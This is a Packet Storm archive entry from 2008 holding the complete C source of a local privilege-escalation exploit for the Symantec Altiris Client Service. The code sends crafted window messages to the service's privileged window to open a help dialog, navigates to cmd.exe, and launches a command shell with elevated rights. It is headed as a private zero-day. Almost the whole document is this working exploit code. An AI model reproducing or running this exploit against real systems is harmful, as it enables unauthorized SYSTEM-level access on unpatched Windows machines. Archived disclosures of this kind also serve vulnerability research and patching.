symantec-escalate.txt

2008-05-15T00:00:00
ID PACKETSTORM:66412
Type packetstorm
Reporter Alex Hernandez
Modified 2008-05-15T00:00:00

Description

                                        
                                            `// 0day PRIVATE NOT DISTRIBUTE!!!  
//  
// Symantec Altiris Client Service Local Exploit (0day)   
//  
// Affected Versions : Altiris Client 6.5.248  
// Altiris Client 6.5.299  
// Altiris client 6.8.378  
//  
// Alex Hernandez aka alt3kx   
// ahernandez [at] sybsecurity.com  
//  
// Eduardo Vela aka sirdarckcat   
// sirdarckcat [at] gmail.com  
//  
// We'll see you soon at ph-neutral 0x7d8  
  
#include "stdio.h"  
#include "windows.h"  
  
int main(int argc, char* argv[])  
{  
HWND lHandle, lHandle2;  
POINT point;  
int id,a=0;  
char langH[255][255];  
char langO[255][255];  
char wname[]="Altiris Client Service";  
  
strcpy(langH[0x0c],"Aide de Windows");  
strcpy(langH[0x09],"Windows Help");  
strcpy(langH[0x0a],"Ayuda de Windows");  
  
strcpy(langO[0x0c],"Ouvrir");  
strcpy(langO[0x09],"Open");  
strcpy(langO[0x0a],"Abrir");  
  
printf("##########################################################\n");  
printf("# Altiris Client Service #\n");  
printf("# WM_COMMANDHELP Windows Privilege Escalation Exploit #\n");  
printf("# by sirdarckcat & alt3kx #\n");  
printf("# #\n");  
printf("# This exploit is based on www.milw0rm.com/exploits/350 #\n");  
printf("# Utility Manager Privilege Elevation Exploit (MS04-019) #\n");  
printf("# by Cesar Cerrudo #\n");  
printf("##########################################################\n\n");  
  
id=PRIMARYLANGID(GetSystemDefaultLangID());  
if (id==0 && (id=PRIMARYLANGID(GetUserDefaultLangID()))){  
printf("Lang not found, using english\n");  
id=9;  
}  
  
char sText[]="%windir%\\system32\\cmd.ex?";  
  
if (argc<2){  
printf("Use:\n> %s [LANG-ID]\n\n",argv[0]);  
printf("Look for your LANG-ID here:\n");  
printf("http://msdn2.microsoft.com/en-us/library/ms776294.aspx\n");  
printf("\nAnyway, the program will try to guess it.\n\n");  
return 0;  
}else{  
if (argc==2){  
if (langH[atoi(argv[1])]){  
id=atoi(argv[1]);  
printf("Lang changed\n");  
}else{  
printf("Lang not supported\n",id);  
}  
}  
}  
printf("Using Lang %d\n",id);  
printf("Looking for %s..\n",wname);  
lHandle=FindWindow(NULL, wname);   
if (!lHandle) {  
printf("Window %s not found\n", wname);  
return 0;  
}else{  
printf("Found! exploiting..\n");  
}  
PostMessage(lHandle,0x313,NULL,NULL);  
  
Sleep(100);  
  
SendMessage(lHandle,0x365,NULL,0x1);  
Sleep(300);  
pp:  
if (!FindWindow(NULL, langH[id])){  
printf("Help Window not found.. exploit unsuccesful\n");  
if (id!=9){  
printf("Trying with english..\n");  
id=9;  
goto pp;  
}else{  
return 0;  
}   
}else{  
printf("Help Window found! exploiting..\n");  
}   
SendMessage (FindWindow(NULL, langH[id]), WM_IME_KEYDOWN, VK_RETURN, 0);  
Sleep(500);  
lHandle = FindWindow("#32770",langO[id]);  
lHandle2 = GetDlgItem(lHandle, 0x47C);  
Sleep(500);  
printf("Sending path..\n");  
SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);  
Sleep(800);  
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);  
lHandle2 = GetDlgItem(lHandle, 0x4A0);  
printf("Looking for cmd..\n");   
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);  
Sleep(500);  
lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);  
lHandle2 = GetDlgItem(lHandle2, 0x1);  
printf("Sending keys..\n");  
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0);  
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0);  
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0);  
Sleep(500);  
mark:  
PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);  
Sleep(1000);  
point.x =10; point.y =30;  
lHandle2=WindowFromPoint(point);  
Sleep(1000);  
printf("Opening shell..\n");  
SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);  
Sleep(1000);  
SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);  
Sleep(1000);  
SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0);  
Sleep(1000);  
if (!FindWindow(NULL,"C:\\WINDOWS\\system32\\cmd.exe") && !FindWindow(NULL,"C:\\WINNT\\system32\\cmd.exe")){  
printf("Failed\n");  
if (!a){  
a++;  
goto mark;  
}  
}else{  
printf("Done!\n");  
}  
if(!a){  
SendMessage (lHandle, WM_CLOSE,0,0);  
Sleep(500);  
SendMessage (FindWindow(NULL, langH[id]), WM_CLOSE, 0, 0);  
SendMessage (FindWindow(NULL, argv[1]), WM_CLOSE, 0, 0);  
}else{  
printf("The exploit failed, but maybe the context window of the shell is visibile.\n");  
}  
return 0;  
}  
  
`